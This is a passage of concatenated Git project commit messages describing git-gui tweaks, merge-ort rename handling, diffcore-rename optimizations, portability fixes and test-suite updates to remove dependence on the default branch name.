Added selected state colors for text widget.
Same colors for active and inactive selection, to match previous
behaviour.
Signed-off-by: Serg Tereshchenko <serg.partizan@gmail.com>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
The 'clean' target is noticeably slow on cygwin, even for a 'do-nothing'
invocation of 'make clean'. For example, the second 'make clean' given
below:
$ make clean >/dev/null 2>&1
$ make clean
GITGUI_VERSION = 0.21.0.85.g3e5c
rm -rf git-gui lib/tclIndex po/*.msg
rm -rf GIT-VERSION-FILE GIT-GUI-VARS
$
has been timed at 1.934s on my laptop (an old core i5-4200M @ 2.50GHz,
8GB RAM, 1TB HDD).
Notice that the Makefile, as part of processing the 'clean' target, is
updating the 'GIT-VERSION-FILE' file. This is to ensure that the
$(GITGUI_VERSION) make variable is set, once that file had been included.
However, the 'clean' target does not use the $(GITGUI_VERSION) variable,
so this is wasted effort.
In order to eliminate such wasted effort, use the value of the internal
$(MAKECMDGOALS) variable to only '-include GIT-VERSION-FILE' when the
target is not 'clean'. (This drops the time down to 0.676s, on my laptop,
giving an improvement of 65.05%).
Signed-off-by: Ramsay Jones <ramsay@ramsayjones.plus.com>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
The aqua theme on Mac doesn't support changing the background color for labels
and frames [1]. Since the red, green, and yellow backgrounds of the labels for
unstaged and staged files and the diff pane are so important design elements of
git gui's main window, it's not acceptable for them to have grey backgrounds on
Mac.
To work around this, simply use non-themed widgets for all labels on Mac. This
is not a big problem because labels don't look extremely different between the
themed and non-themed versions. There are subtle differences, but they are not
as bad as having the wrong background color.
[1] https://stackoverflow.com/a/6723911
Signed-off-by: Stefan Haller <stefan@haller-berlin.de>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
The MKDIR_WO_TRAILING_SLASH and NO_SETITIMER options are no longer
needed on the NonStop platforms as both are now supported by the
oldest supported operating system revision.
Signed-off-by: Randall S. Becker <rsbecker@nexbridge.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Implement merge_incore_recursive(), mostly through the use of a new
helper function, merge_ort_internal(), which itself is based off
merge_recursive_internal() from merge-recursive.c.
This drops the number of failures in the testsuite when run under
GIT_TEST_MERGE_ALGORITHM=ort from around 1500 to 647.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In order to handle recursive merges, after merging merge-bases we need
to clear away most of the data we had built up but some of it needs to
be kept -- in particular the "output" field. Rename the function to
reflect its future change in use.
Further, since "reinitialize" means we'll be reusing the fields
immediately, take advantage of this to only partially clear maps,
leaving the hashtable allocated and pre-sized. (This may be slightly
out-of-order since the speedups aren't realized until there are far
more strmaps in use, but the patch submission process already went out
of order because of various questions and requests for strmap. Anyway,
see commit 6ccdfc2a20 ("strmap: enable faster clearing and reusing of
strmaps", 2020-11-05), for performance details about the use of
strmap_partial_clear().)
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a subsequent commit, we will implement the traditional recursiveness
that gave merge-recursive its name, namely merging non-unique
merge-bases to come up with a single virtual merge base. Copy a few
helper functions from merge-recursive.c that we will use in the
implementation.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Command `git pack-redundant --all` will crash if there is only one
packfile in the repository. This is because, if there is only one
packfile in local_packs, `cmp_local_packs` will do nothing and will
leave `pl->unique_objects` as uninitialized.
Also add testcases for repository with no packfile and one packfile
in t5323.
Reported-by: Daniel C. Klauer <daniel.c.klauer@web.de>
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 8164360fc8 (t9902: prepare a test for the upcoming default branch
name, 2020-10-23), we started adjusting this test script for the default
initial branch name changing to `main`.
However, there is no need to wait for that: let's adjust the test script
to stop relying on a specific initial branch name by setting it
explicitly. This allows us to drop the `PREPARE_FOR_MAIN_BRANCH` prereq
from one test case.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 66713e84e7 (tests: prepare aligned mentions of the default branch
name, 2020-10-23), we started adjusting this test script for the default
initial branch name changing to `main`.
However, there is no need to wait for that: let's adjust the test script
to stop relying on a specific initial branch name by setting it
explicitly. This allows us to drop the `PREPARE_FOR_MAIN_BRANCH` prereq
from six test cases.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 97cf8d50b5 (t5703: adjust a test case for the upcoming default
branch name, 2020-10-23), we prepared this test script for a world when
the default initial branch name would be `main`.
However, there is no need to wait for that: let's adjust the test script
to stop relying on a specific initial branch name by setting it
explicitly. This allows us to drop the `PREPARE_FOR_MAIN_BRANCH` prereq
from one test case.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 66713e84e7 (tests: prepare aligned mentions of the default branch
name, 2020-10-23), we prepared this test script for a time when the
default initial branch name would be `main`.
However, there is no need to wait for that: let's adjust the test script
to stop relying on a specific initial branch name by setting it
explicitly. This allows us to drop the `PREPARE_FOR_MAIN_BRANCH` prereq
from two test cases.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 66713e84e7 (tests: prepare aligned mentions of the default branch
name, 2020-10-23), we started that transition, trying to prepare for a
time when `git init` would use that name for the initial branch.
Even if that time has not arrived, we can complete the transition by
making the test script independent of the default branch name. This also
allows us to drop the `PREPARE_FOR_MAIN_BRANCH` prereq from four test
cases.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 66713e84e7 (tests: prepare aligned mentions of the default branch
name, 2020-10-23), we started that transition, trying to prepare for a
time when `git init` would use that name for the initial branch.
Even if that time has not arrived, we can complete the transition by
making the test script independent of the default branch name. This also
allows us to drop the `PREPARE_FOR_MAIN_BRANCH` prereq from one test
case.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 66713e84e7 (tests: prepare aligned mentions of the default branch
name, 2020-10-23), we started that transition, trying to prepare for a
time when `git init` would use that name for the initial branch.
Even if that time has not arrived, we can complete the transition by
making the test script independent of the default branch name. This also
allows us to drop the `PREPARE_FOR_MAIN_BRANCH` prereq from one test
case.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 66713e84e7 (tests: prepare aligned mentions of the default branch
name, 2020-10-23), we started that transition, trying to prepare for a
time when `git init` would use that name for the initial branch.
Even if that time has not arrived, we can complete the transition by
making the test script independent of the default branch name. This also
allows us to drop the `PREPARE_FOR_MAIN_BRANCH` prereq from one test
case.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 56300ff356 (t3200: prepare for `main` being shorter than `master`,
2020-10-23) and in 66713e84e7 (tests: prepare aligned mentions of the
default branch name, 2020-10-23), we started to prepare t3200 for a new
world where `git init` uses the branch name `main` for the initial
branch.
We do not even have to wait for that new world: we can easily ensure
that that branch name is used, independent of the exact name `git init`
will give the initial branch, so let's do that.
This also lets us remove the `PREPARE_FOR_MAIN_BRANCH` prereq from three
test cases in that script.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 3224b0f0bb (t1400: prepare for `main` being default branch name,
2020-10-23), we prepared t1400 for a time when the default initial
branch name would be `main`.
However, there is no need to wait that long: let's adjust the test
script to stop relying on a specific initial branch name by setting it
explicitly. This allows us to drop the `PREPARE_FOR_MAIN_BRANCH` prereq
from two test cases.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Just like "git diff -w --exit-code" should exit with 0 when ignoring
whitespace differences results in no changes shown, if ignoring
certain changes with "git diff -I<pattern> --exit-code" result in an
empty patch, we should exit with 0.
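The intended exit status can be modeled as below. This is only a Python sketch of the rule, assuming that a change is ignored when all of its lines match the pattern; `diff_exit_code` and its list-of-lists input are illustrative and do not correspond to the diff machinery itself.

```python
import re


def diff_exit_code(changes, ignore_pattern):
    """Return 1 if any change survives the ignore pattern, else 0.

    changes -- list of changes, each a list of changed lines
    """
    regex = re.compile(ignore_pattern)
    for change in changes:
        # A change is ignored only when every one of its lines matches.
        if not all(regex.search(line) for line in change):
            return 1
    # Nothing left to show: the patch is empty, so report "no differences".
    return 0
```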
The test suite did not cover the interaction between "--exit-code"
and "-w"; add one while adding a new test for "--exit-code" + "-I".
Signed-off-by: Junio C Hamano <gitster@pobox.com>
test_perf() runs each test in its own subshell which makes it difficult
to persist variables between tests. test_export() addresses this
shortcoming by grabbing the values of specified variables after a test
runs but before the subshell exits, and writes those values to a file
which is loaded into the environment of subsequent tests.
To grab the values to be persisted, test_export() pipes the output of
the shell's builtin `set` command through `sed` which plucks them out
using a regular expression along the lines of `s/^(var1|var2)/.../p`.
Unfortunately, though, this use of alternation is not portable. For
instance, BSD-lineage `sed` (including macOS `sed`) does not support it
in the default "basic regular expression" mode (BRE). It may be possible
to enable "extended regular expression" mode (ERE) in some cases with
`sed -E`, however, `-E` is neither portable nor part of POSIX.
Fortunately, alternation is unnecessary in this case and can easily be
avoided, so replace it with a series of simple expressions such as
`s/^var1/.../p;s/^var2/.../p`.
While at it, tighten the expressions so they match the variable names
exactly rather than matching prefixes (i.e. use `s/^var1=/.../p`).
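The difference between prefix matching and exact matching can be illustrated outside of `sed`. The Python sketch below is an analogy only (the real fix stays in `sed`); `pick_variables` is a hypothetical helper that applies one simple anchored pattern per variable, mirroring the series of expressions described above.

```python
import re


def pick_variables(set_output, names):
    """Return the 'name=value' lines whose name is exactly one of names."""
    picked = []
    for line in set_output.splitlines():
        for name in names:
            # One simple pattern per variable, anchored at the start of
            # the line and terminated by "=", so "var1" cannot match a
            # line such as "var10=...".
            if re.match(re.escape(name) + "=", line):
                picked.append(line)
                break
    return picked
```

No alternation is needed: each variable gets its own pattern, and the trailing "=" is what turns a prefix match into an exact match on the name.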
If the requirements of test_export() become more complex in the future,
then an alternative would be to replace `sed` with `perl` which supports
alternation on all platforms, however, the simple elimination of
alternation via multiple `sed` expressions suffices for the present.
Reported-by: Sangeeta <sangunb09@gmail.com>
Diagnosed-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There's no need to display the annoying warning on every pull... only
the ones that are not fast-forward.
The current warning tests still pass, but not because of the arguments
or the configuration, but because they are all fast-forward.
We need to test non-fast-forward situations now.
Suggestions-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Refactor the advise() call that teaches users how they can choose
between merge and rebase into a helper function. This revealed that
the caller's logic needs to be further clarified to allow future
actions (like "erroring out" instead of the current "go ahead and
merge anyway") that should happen whether the advice message is
squelched out.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is easy enough to do, and gives a more descriptive name to the
variable that is scoped in a more focused way.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Implement cases where renames are involved in type changes (i.e. the
side of history that didn't rename the file changed its type from a
regular file to a symlink or submodule). There was some code to handle
this in merge-recursive but only in the special case when the renamed
file had no content changes. The code here works differently -- it
knows process_entry() can handle mode conflicts, so it does a few
minimal tweaks to ensure process_entry() can just finish the job as
needed.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Implement handling of normal renames. This code replaces the following
from merge-recursive.c:
* the code relevant to RENAME_NORMAL in process_renames()
* the RENAME_NORMAL case of process_entry()
Also, there is some shared code from merge-recursive.c for multiple
different rename cases which we will no longer need for this case (or
other rename cases):
* handle_rename_normal()
* setup_rename_conflict_info()
The consolidation of four separate codepaths into one is made possible
by a change in design: process_renames() tweaks the conflict_info
entries within opt->priv->paths such that process_entry() can then
handle all the non-rename conflict types (directory/file, modify/delete,
etc.) orthogonally. This means we're much less likely to miss special
implementation of some kind of combination of conflict types (see
commits brought in by 66c62eaec6 ("Merge branch 'en/merge-tests'",
2020-11-18), especially commit ef52778708 ("merge tests: expect improved
directory/file conflict handling in ort", 2020-10-26) for more details).
That, together with letting worktree/index updating be handled
orthogonally in the merge_switch_to_result() function, dramatically
simplifies the code for various special rename cases.
(To be fair, the code for handling normal renames wasn't all that
complicated beforehand, but it's still much simpler now.)
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Implement rename/rename(2to1) and rename/add handling, i.e. a file is
renamed into a location where another file is added (with that other
file either being a plain add or itself coming from a rename). Note
that rename collisions can also have a special case stacked on top: the
file being renamed on one side of history is deleted on the other
(yielding either a rename/add/delete conflict or perhaps a
rename/rename(2to1)/delete[/delete] conflict).
One thing to note here is that when there is a double rename, the code
in question only handles one of them at a time; a later iteration
through the loop will handle the other. After they've both been
handled, process_entry()'s normal add/add code can handle the collision.
This code replaces the following from merge-recursive.c:
* all the 2to1 code in process_renames()
* the RENAME_TWO_FILES_TO_ONE case of process_entry()
* handle_rename_rename_2to1()
* handle_rename_add()
Also, there is some shared code from merge-recursive.c for multiple
different rename cases which we will no longer need for this case (or
other rename cases):
* handle_file_collision()
* setup_rename_conflict_info()
The consolidation of six separate codepaths into one is made possible
by a change in design: process_renames() tweaks the conflict_info
entries within opt->priv->paths such that process_entry() can then
handle all the non-rename conflict types (directory/file, modify/delete,
etc.) orthogonally. This means we're much less likely to miss special
implementation of some kind of combination of conflict types (see
commits brought in by 66c62eaec6 ("Merge branch 'en/merge-tests'",
2020-11-18), especially commit ef52778708 ("merge tests: expect improved
directory/file conflict handling in ort", 2020-10-26) for more details).
That, together with letting worktree/index updating be handled
orthogonally in the merge_switch_to_result() function, dramatically
simplifies the code for various special rename cases.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Implement rename/delete conflicts, i.e. one side renames a file and the
other deletes the file. This code replaces the following from
merge-recursive.c:
* the code relevant to RENAME_DELETE in process_renames()
* the RENAME_DELETE case of process_entry()
* handle_rename_delete()
Also, there is some shared code from merge-recursive.c for multiple
different rename cases which we will no longer need for this case (or
other rename cases):
* handle_change_delete()
* setup_rename_conflict_info()
The consolidation of five separate codepaths into one is made possible
by a change in design: process_renames() tweaks the conflict_info
entries within opt->priv->paths such that process_entry() can then
handle all the non-rename conflict types (directory/file, modify/delete,
etc.) orthogonally. This means we're much less likely to miss special
implementation of some kind of combination of conflict types (see
commits brought in by 66c62eaec6 ("Merge branch 'en/merge-tests'",
2020-11-18), especially commit ef52778708 ("merge tests: expect improved
directory/file conflict handling in ort", 2020-10-26) for more details).
That, together with letting worktree/index updating be handled
orthogonally in the merge_switch_to_result() function, dramatically
simplifies the code for various special rename cases.
To be fair, there is a _slight_ tweak to process_entry() here, because
rename/delete cases will also trigger the modify/delete codepath.
However, we only want a modify/delete message to be printed for a
rename/delete conflict if there is a content change in the renamed file
in addition to the rename. So process_renames() and process_entry()
aren't quite fully orthogonal, but they are pretty close.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Implement rename/rename(1to2) handling, i.e. both sides of history
rename a file, but rename it differently. This code replaces the
following from merge-recursive.c:
* all the 1to2 code in process_renames()
* the RENAME_ONE_FILE_TO_TWO case of process_entry()
* handle_rename_rename_1to2()
Also, there is some shared code from merge-recursive.c for multiple
different rename cases which we will no longer need for this case (or
other rename cases):
* handle_file_collision()
* setup_rename_conflict_info()
The consolidation of five separate codepaths into one is made possible
by a change in design: process_renames() tweaks the conflict_info
entries within opt->priv->paths such that process_entry() can then
handle all the non-rename conflict types (directory/file, modify/delete,
etc.) orthogonally. This means we're much less likely to miss special
implementation of some kind of combination of conflict types (see
commits brought in by 66c62eaec6 ("Merge branch 'en/merge-tests'",
2020-11-18), especially commit ef52778708 ("merge tests: expect improved
directory/file conflict handling in ort", 2020-10-26) for more details).
That, together with letting worktree/index updating be handled
orthogonally in the merge_switch_to_result() function, dramatically
simplifies the code for various special rename cases.
To be fair, there is a _slight_ tweak to process_entry() here to make
sure that the two different paths aren't marked as clean but are left in
a conflicted state. So process_renames() and process_entry() aren't
quite entirely orthogonal, but they are pretty close.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Implement rename/rename(1to1) handling, i.e. both sides of history
rename a file, and rename it the same way. This code replaces the
following from merge-recursive.c:
* all the 1to1 code in process_renames()
* the RENAME_ONE_FILE_TO_ONE case of process_entry()
Also, there is some shared code from merge-recursive.c for multiple
different rename cases which we will no longer need for this case (or
other rename cases):
* handle_rename_normal()
* setup_rename_conflict_info()
The consolidation of four separate codepaths into one is made possible
by a change in design: process_renames() tweaks the conflict_info
entries within opt->priv->paths such that process_entry() can then
handle all the non-rename conflict types (directory/file, modify/delete,
etc.) orthogonally. This means we're much less likely to miss special
implementation of some kind of combination of conflict types (see
commits brought in by 66c62eaec6 ("Merge branch 'en/merge-tests'",
2020-11-18), especially commit ef52778708 ("merge tests: expect improved
directory/file conflict handling in ort", 2020-10-26) for more details).
That, together with letting worktree/index updating be handled
orthogonally in the merge_switch_to_result() function, dramatically
simplifies the code for various special rename cases.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove this unreachable code. It was found via a non-fatal warning
emitted by SunCC. It's one of the things it's more vehement about than
GCC & Clang.
It complains about a lot of other similarly unreachable code, e.g. a
BUG(...) without a "return", and a "return 0" after a long if/else,
both of which have "return" statements. Those are also genuine
redundancies to a compiler, but arguably make the code a bit easier to
read & less fragile to maintain.
These return/break cases are just unnecessary however, and as seen
here the surrounding code just did a plain "return" without a "break"
already.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When 15b52a44 (compat-util: type-check parameters of no-op
replacement functions, 2020-08-06) turned a handful of no-op
C-preprocessor macros into static inline functions to give the
callers a better type checking for their parameters, it forgot
to return anything from the stubbed out setitimer() function,
even though the function was defined to return an int just like the
real thing.
Since the original C-preprocessor macro implementation was to just
turn the call to the function into an empty statement, we know that the
existing callers do not check the return value from it, and it does
not matter what value we return. But it is safer to pretend that
the call succeeded by returning 0 than making it fail by returning -1
and clobbering errno with some value.
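A minimal sketch of the shape of such a stub after the fix. The names
sketch_itimerval and sketch_setitimer are hypothetical stand-ins used
only for illustration, not the actual compat code:

```c
#include <stddef.h>

/* Hypothetical stand-in for struct itimerval on a platform that lacks it. */
struct sketch_itimerval {
	long interval_sec;
	long value_sec;
};

/*
 * No-op replacement: the compiler still type-checks the arguments, and
 * the function reports success instead of reaching the closing brace
 * of an int function without returning a value.
 */
static inline int sketch_setitimer(int which,
				   const struct sketch_itimerval *newvalue,
				   struct sketch_itimerval *oldvalue)
{
	(void)which;
	(void)newvalue;
	(void)oldvalue;
	return 0; /* pretend the call succeeded */
}
```

A caller that ignores the result behaves exactly as it did with the
empty-statement macro; a caller that checks it sees success.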
Reported-by: Randall S. Becker <rsbecker@nexbridge.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Two "static inline" functions, both of which return void, call
strmap_remove() and try to return the value it returns as their
return value, which is just bogus, as strmap_remove() returns void
itself. Call it in the void context and let control fall through to
the end instead.
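The pattern can be sketched as follows. Both function names and the
counter are hypothetical; they only mimic a void wrapper around a void
helper:

```c
/* Counts removals so that the effect of the call is observable. */
static int sketch_removed;

/* Hypothetical stand-in for a removal function that returns void. */
static void sketch_map_remove(const char *key)
{
	(void)key;
	sketch_removed++;
}

/*
 * The wrapper also returns void: call the helper as a plain statement
 * and let control reach the closing brace, rather than writing
 * "return sketch_map_remove(key);".
 */
static inline void sketch_set_remove(const char *key)
{
	sketch_map_remove(key);
}
```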
Reported-by: Randall S. Becker <rsbecker@nexbridge.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The subcommand is unusably slow and the reason why nobody reports it
as a performance bug is suspected to be the absence of users. Let's
show a big message that asks the user to tell us that they still
care about the command when an attempt is made to run the command,
with an escape hatch to override it with a command line option.
In a few releases, we may turn it into an error and keep it for a
few more releases before finally removing it (during the whole time,
the plan to remove it would be interrupted by an end user raising a hand).
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 0b4396f068 (git-p4: make python2.7 the oldest supported version,
2019-12-13) pointed out that git-p4 uses Python 2.7-or-later features
in the code.
In addition, git-p4 gained enough support for Python 3 from
6cec21a82f (git-p4: encode/decode communication with p4 for
python3, 2019-12-13).
Let's update our documentation to reflect that fact.
Signed-off-by: Đoàn Trần Công Danh <congdanhqx@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Test update.
* js/t5526-with-no-particular-primary-branch-name:
t5526: drop the prereq expecting the default branch name `main`
t5526: avoid depending on a specific default branch name
Tighten error checking in the codepath that responds to "git fetch".
* jk/check-config-parsing-error-in-upload-pack:
upload-pack: propagate return value from object filter config callback
Newer versions of xsltproc can assign IDs in HTML documents it
generates in a consistent manner. Use the feature to help format
HTML version of the user manual reproducibly.
* ae/doc-reproducible-html:
doc: make HTML manual reproducible
The glossary described a branch as an "active" line of development,
which is misleading---a stale and non-moving branch is still a
branch.
* so/glossary-branch-is-not-necessarily-active:
glossary: improve "branch" definition
"@" sometimes worked (e.g. "git push origin @:there") as a part of
a refspec element, but "git push origin @" did not work, which has
been corrected.
* fc/atmark-in-refspec:
refspec: make @ a synonym of HEAD
tests: push: trivial cleanup
tests: push: improve cleanup of HEAD tests
"git $cmd $args", when $cmd is not a recognised subcommand, by
default tries to see if $cmd is a typo of an existing subcommand
and optionally executes the corrected command if there is only one
possibility, depending on the setting of help.autocorrect; the
users can now disable the whole thing, including the cycles spent
to find a likely typo, by setting the configuration variable to
'never'.
* dd/help-autocorrect-never:
help.c: help.autocorrect=never means "do not compute suggestions"
register_rename_src() simply references the passed pair inside
rename_src. In contrast, add_rename_dst() did something entirely
different for rename_dst. Instead of copying the passed pair, it made a
copy of the second diff_filespec from the passed pair, referenced it,
and then set the diff_rename_dst.pair field to NULL. Later, when a
pairing is found, record_rename_pair() allocated a full diff_filepair
via diff_queue() and pointed its src and dst fields at the appropriate
diff_filespecs. This contrast between register_rename_src() for the
rename_src data structure and add_rename_dst() for the rename_dst data
structure is oddly inconsistent and requires more memory and work than
necessary. Let's just reference the original diff_filepair in
rename_dst as-is, just as we do with rename_src. Add a new
rename_dst.is_rename field, since the rename_dst.p field is never NULL
unlike the old rename_dst.pair field.
Taking advantage of this change and the fact that same-named paths will
be adjacent, we can get rid of the sorting of the array and most of the
lookups on it, allowing us to instead just append as we go. However,
there is one remaining reason to still keep locate_rename_dst():
handling broken pairs (i.e. when break detection is on). Those are
somewhat rare, but we can set up a simple strintmap to get the map
between the source and the index. Doing that allows us to still have a
fast lookup without sorting the rename_dst array. Since the sorting had
been done in a weakly quadratic manner, when many renames are involved
this time could add up.
There is still a strcmp() in add_rename_dst() that I have left in place
to make it easier to verify that the algorithm has the same results.
This strcmp() is there to check for duplicate destination entries (which
was the easiest way at the time to avoid segfaults in the
diffcore-rename code when trees had multiple entries at a given path).
The underlying double free()s are no longer an issue with the new
algorithm, but that can be addressed in a subsequent commit.
This patch is being submitted in a different order than its original
development, but in a large rebase of many commits with lots of renames
and with several optimizations to inexact rename detection, both setup
time and write back to output queue time from diffcore_rename() were
sizeable chunks of overall runtime. This patch accelerated the setup
time by about 65%, and final write back to the output queue time by
about 50%, resulting in an overall drop of 3.5% on the execution time of
rebasing a few dozen patches.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
register_rename_src() took pains to create an array in rename_src which
was sorted by pathname of the contained diff_filepair. The sorting was
entirely unnecessary since callers pass filepairs to us in sorted
order. We can simply append to the end of the rename_src array,
speeding up diffcore_rename() setup time.
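A minimal sketch of the append-only approach, assuming a simplified
list of path strings rather than diff_filepairs. The struct and
function names are hypothetical:

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical, simplified stand-in for the rename_src array. */
struct sketch_src_list {
	const char **paths;
	size_t nr, alloc;
};

/*
 * Append without searching for an insertion point. This is only
 * correct because callers are assumed to pass paths in sorted order.
 */
static void sketch_register_src(struct sketch_src_list *list, const char *path)
{
	/* Sanity check for the sorted-input assumption. */
	assert(!list->nr || strcmp(list->paths[list->nr - 1], path) <= 0);

	if (list->nr == list->alloc) {
		size_t new_alloc = list->alloc ? 2 * list->alloc : 8;
		const char **grown = realloc(list->paths,
					     new_alloc * sizeof(*grown));
		if (!grown)
			abort();
		list->paths = grown;
		list->alloc = new_alloc;
	}
	list->paths[list->nr++] = path;
}
```

Each registration is amortized constant time, whereas a sorted insert
has to locate a position and shift later elements.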
Also, note that I changed the function to return void, since its return
value was unconditionally discarded anyway.
This patch is being submitted in a different order than its original
development, but in a large rebase of many commits with lots of renames
and with several optimizations to inexact rename detection,
diffcore_rename() setup time was a sizeable chunk of overall runtime.
This patch dropped execution time of rebasing 35 commits with lots of
renames by 2% overall.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
While creating the last commit, I found a number of other cases where
git would segfault when faced with trees that have duplicate entries.
None of these segfaults are in the diffcore-rename code (they all occur
in cache-tree and unpack-trees). Further, to my knowledge, no one has
ever been adversely affected by these bugs, and given that it has been
15 years and folks have fixed a few other issues with historical
duplicate entries (as noted in the last commit), I am not sure we will
ever run into anyone having problems with these. So I am not sure these
are worth fixing, but it doesn't hurt to at least document these
failures in the same test file that is concerned with duplicate tree
entries.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 4d6be03b95 ("diffcore-rename: avoid processing duplicate
destinations", 2015-02-26) added t4058 to demonstrate that a workaround
it added to avoid double frees (namely to just turn off rename detection
when trees had duplicate entries) would indeed avoid segfaults. The
tests, though, give the impression that the expected diffs are "correct"
when in reality they are just "don't segfault, and do something
semi-reasonable under the circumstances". Add some notes to make this
clearer.
Also, commit 25d5ea410f ("[PATCH] Redo rename/copy detection logic.",
2005-05-24) added a similar workaround to avoid segfaults, but for
rename_src rather than rename_dst. I do not see any tests in the
testsuite to cover the collision detection of entries limited to the
source side, so add a couple.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Inexact rename detection works by comparing all sources to all
destinations, computing similarities, and then finding the best matches
among those that are sufficiently similar.
However, it is preceded by exact rename detection that works by
checking if there are files with identical hashes. If exact renames are
found, we can exclude some files from inexact rename detection.
The inexact rename detection loops over the full set of files, but
immediately skips those for which rename_dst[i].is_rename is true and
thus doesn't compare any sources to that destination. As such, these
paths shouldn't be included in the progress counter.
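As a rough sketch of the counting, assume the progress total is the
number of source/destination comparisons that will actually be made.
The struct and function names here are hypothetical:

```c
#include <stddef.h>

/* Hypothetical, simplified destination entry. */
struct sketch_dst {
	int is_rename; /* already paired by exact rename detection */
};

/*
 * Count only the destinations that the inexact loop will compare
 * against sources; the ones already marked is_rename are skipped.
 */
static size_t sketch_progress_total(const struct sketch_dst *dst,
				    size_t num_dst, size_t num_src)
{
	size_t i, pending = 0;

	for (i = 0; i < num_dst; i++)
		if (!dst[i].is_rename)
			pending++;
	return pending * num_src;
}
```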
For the eagle eyed, this change hints at an actual optimization -- the
first one I presented at Git Merge 2020. I'll be submitting that
optimization later, once the basic merge-ort algorithm has merged.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
diffcore-rename had two different checks of the form
    if ((a < limit || b < limit) &&
        a * b <= limit * limit)
This can be simplified to
    if (st_mult(a, b) <= st_mult(limit, limit))
which makes it clearer how we are checking for overflow, and makes it
much easier to parse given the drop from 8 to 4 variable appearances.
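To illustrate the overflow-checked comparison, here is a sketch with
hypothetical helpers. Note one deliberate difference: st_mult() dies
when the product does not fit in size_t, while this variant returns -1
so that the overflow case can be exercised:

```c
#include <stddef.h>
#include <stdint.h>

/* Returns 1 if a * b would not fit in size_t. */
static int sketch_mult_overflows(size_t a, size_t b)
{
	return a != 0 && b > SIZE_MAX / a;
}

/*
 * Returns 1 if num_dst * num_src is within limit * limit, 0 if it is
 * not, and -1 if either product would overflow.
 */
static int sketch_within_limit(size_t num_dst, size_t num_src, size_t limit)
{
	if (sketch_mult_overflows(num_dst, num_src) ||
	    sketch_mult_overflows(limit, limit))
		return -1;
	return num_dst * num_src <= limit * limit;
}
```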
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
too_many_rename_candidates() got the number of rename destinations via
an argument to the function, but the number of rename sources via a
global variable. That felt rather inconsistent. Pass in the number of
rename sources as an argument as well.
While we are at it... We had a local variable, num_src, that served two
purposes. Initially it was set to the global value, but later was used
for counting a subset of the number of sources. Since we now have a
function argument for the former usage, introduce a clearer variable
name for the latter usage.
This patch has no behavioral changes; it's just renaming and passing an
argument instead of grabbing it from the global namespace. (You may
find it easier to view the patch using git diff's --color-words option.)
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our main data structures are rename_src and rename_dst. For counters of
these data structures, num_sources and num_destinations seem natural;
